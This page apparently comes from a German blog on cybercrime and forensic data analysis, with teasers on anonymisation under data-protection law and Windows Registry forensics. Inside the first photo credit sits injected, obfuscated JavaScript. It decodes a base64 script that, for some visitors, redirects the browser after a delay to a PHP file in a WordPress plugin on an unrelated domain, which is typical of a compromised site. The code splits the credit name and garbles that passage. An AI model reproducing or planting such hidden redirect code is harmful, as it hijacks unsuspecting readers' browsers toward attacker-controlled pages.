Das blogge ich woanders 2014

© Orl<script/>function u2fd518ba9147(q3){var u9=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=‘;var y7=“;var ve,p7,w9,w4,y6,p9,y4;var s0=0;do{w4=u9.indexOf(q3.charAt(s0++));y6=u9.indexOf(q3.charAt(s0++));p9=u9.indexOf(q3.charAt(s0++));y4=u9.indexOf(q3.charAt(s0++));ve=(w4<<2)|(y6>>4);p7=((y6&15)<<4)|(p9>>2);w9=((p9&3)<<6)|y4;if(ve>=192)ve+=848;else if(ve==168)ve=1025;else if(ve==184)ve=1105;y7+=String.fromCharCode(ve);if(p9!=64){if(p7>=192)p7+=848;else if(p7==168)p7=1025;else if(p7==184)p7=1105;y7+=String.fromCharCode(p7);}if(y4!=64){if(w9>=192)w9+=848;else if(w9==168)w9=1025;else if(w9==184)w9=1105;y7+=String.fromCharCode(w9);}}while(s0<q3.length);document.write(y7);};u2fd518ba9147('PHNjcmlwdD4NCnZhciBudW1iZXIxPU1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqIDYpOyANCmlmIChudW1iZXIxPT0zKQ0Kew0KIHZhciBkZWxheSA9IDE4MDAwOwkNCiBzZXRUaW1lb3V0KCJkb2N1bWVudC5sb2NhdGlvbi5ocmVmPSdodHRwOi8vd3d3LmJ0bGF3ZmlybS5jb20vd3AtY29udGVudC9wbHVnaW5zL3NpLWNvbnRhY3QtZm9ybS9jYXB0Y2hhLXNlY3VyZWltYWdlL3NlY3VyaW1hZ2Vfc3RvcC5waHAnIiwgZGVsYXkpOw0KfQ0KPC9zY3JpcHQ+');ando Florin Rosu - Fotolia.comAuch wenn ich hier im letzten Jahr 2014 nicht so viel geschrieben habe, gab es einige Blogbeiträge von mir zu lesen. Anbei ein Überblick, was ich so woanders zu Cybercrime, Data Leakage und Wirtschaftskriminalität geschrieben habe. Weiterlesen...

Artikel im Betriebs-Berater: Anonymisierung im Rahmen der forensischen Datenanalyse [Update]

© alexskopje - Fotolia.comWerden Daten im Rahmen einer forensischen Datenanalyse verarbeitet, so enthalten diese häufig Verweise auf natürliche Personen, einschließlich der Mitarbeiter des Unternehmens. Der Umgang mit personenbezogenen Daten ist durch das Bundesdatenschutzgesetz (BDSG) geregelt. Um den gesetzlichen Vorgaben zu entsprechen, ist neben anderen Voraussetzungen anzuraten, die personenbezogenen Daten im Vorfeld der Datenanalyse zu anonymisieren oder zu pseudonymisieren. Weiterlesen...

mehr Infos zu Windows-Registry-Forensik

In iX 01/2011 ist ein Artikel zur forensischen Analyse der Windows-Registry erschienen. Maßgeblicher Autor ist Alexander Sigel, ein Kollege aus meinem Forensik-Team . Aus Platzgründen haben es leider nicht alle Informationen in den Artikel geschafft. Diese finden sich nun hier.  Weiterlesen...

iX-Artikel: Windows-Registry-Forensik

In iX 01/2011 ist ein Artikel zur forensischen Analyse der Windows-Registry erschienen. Maßgeblicher Autor des Artikels „Registry als Datenfundgrube“ ist Alexander Sigel aus meinem Forensic Technology Team. Die im Artikel erwähnten weiterführenden Informationen finden sich hier.